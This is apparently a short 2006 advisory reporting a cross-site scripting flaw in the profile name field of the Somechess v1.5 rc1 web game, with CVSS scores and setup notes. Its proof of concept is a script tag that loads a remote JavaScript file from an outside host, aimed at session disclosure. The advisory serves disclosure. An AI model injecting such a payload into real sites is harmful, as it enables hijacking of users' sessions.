Somechess v1.5 rc1 - XSS

2006.06.29
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Somechess v1.5 rc1 Homepage: http://www.astrodogpress.org/chess/ Affected files: *Profile input boxes ----------------------- Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like it did to me), then just remove all the " from the sql file. You'll also have to manually add players & their pw's (md5 hashed) via phpmyadmin or whatever you use. Theres also a php error on menu.php that you'll have to fix since it won't allow you to connect to the game DB ----------------------- XSS vuln with session disclosure from "New name" profile input box. Data isn't sanatized before being generated. PoC: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://youfucktard.com/xsp/somechess1.jpg http://youfucktard.com/xsp/somechess2.jpg


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top